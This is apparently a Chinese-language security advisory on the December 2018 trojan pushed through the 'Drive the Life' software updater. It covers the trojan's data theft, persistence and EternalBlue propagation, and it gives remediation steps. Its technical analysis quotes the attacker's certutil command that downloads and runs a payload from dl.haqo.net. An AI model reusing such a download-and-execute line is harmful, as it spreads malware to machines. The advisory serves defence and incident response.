第1章 安全通告

2018 年 12 月 14 日下午，攻击者通过“驱动人生”系列软件“人生日历”等升级程序下发木马。此木马具备远程执行代码功能，还携带有永恒之蓝漏洞攻击组件，可通过永恒之蓝漏洞攻击局域网的其它机器并接收远程指令执行下一步操作。

第2章 文档信息

第3章 事件信息

3.1 事件描述

2018 年 12 月 14 日,攻击者通过“驱动人生”

系列软件“人生日历”等升级程序下发木马。此木马具备远程执行代码功能，

启动后会将用户计算机的详细信息发往木马服务器，并接收远程指令执行下一

步操作。同时其还携带有永恒之蓝漏洞攻击组件，可通过永恒之蓝漏洞攻击局

域网与互联网中其它机器。

在 12 月 14 日下午前后，病毒开始爆发，仅数个小时就感染上万台电脑，在晚间时段，我们发现木马服务器被关闭、人生日历的升级下发通道关闭。不排除后续存在大规模传播的可能性。

3.2 风险等级

风险评级为：高危

预警等级：蓝色预警（一般事件）

第4章 影响范围

安装“驱动人生”系列程序的计算机都有可能受此影响

未安装永恒之蓝系列漏洞（MS17-010）补丁的计算机

第5章 处置建议

1. 使用杀毒软件查杀电脑

2. 做好相关重要数据备份工作

3. 加强系统安全工作，及时升级软件与安装操作系统补丁

4. 服务器暂时关闭不必要的端口（如 135、139、445）

5. 服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解

第6章 技术分析

2018 年 12 月 14 日 14 时，驱动人生旗下的“人生日历”产品，通过其升级组件 DTLUpg.exe，开始下发执行木马程序 f79cb9d2893b254cc75dfb7f3e454a6 9.exe，18 时开始木马推送量开始扩大，到 23 时我们向厂商通报了发现的情

况，下发停止。

截止 12 月 14 日 21 时，该木马累计攻击计算机超过 5.7 万台（不包括漏洞

攻击情况）。

该木马程序执行后，会向系统安装木马服务 Ddriver 实现长期驻留，之后向

服务器 haqo.net 发送宿主机器的详细信息，包括如下信息：

l 计算机名称

l 操作系统版本

l 机器软硬件信息等

之后接收服务器返回的 shellcode 指令执行。

同时该木马具有自升级，远程下载文件执行，远程创建服务等功能。

木马在启动后，会根据服务器指令，下载一款永恒之蓝漏洞利用工具，通过该漏洞利用工具，攻击局域网与互联网中其它计算机，攻击成功后，使用 cer tutil 做跳板程序，向其它机器安装该木马（也可以安装其它木马，由云端服务

器决定）。

certutil -urlcache -split -f hxxp://dl.haqo.net/dl.exe c:\install.exe&c:\install.e

xe&……

第7章 参考资料

[1] https://cert.360.cn/warning/detail?id=57cc079bc4686dd09981bf034130f1c9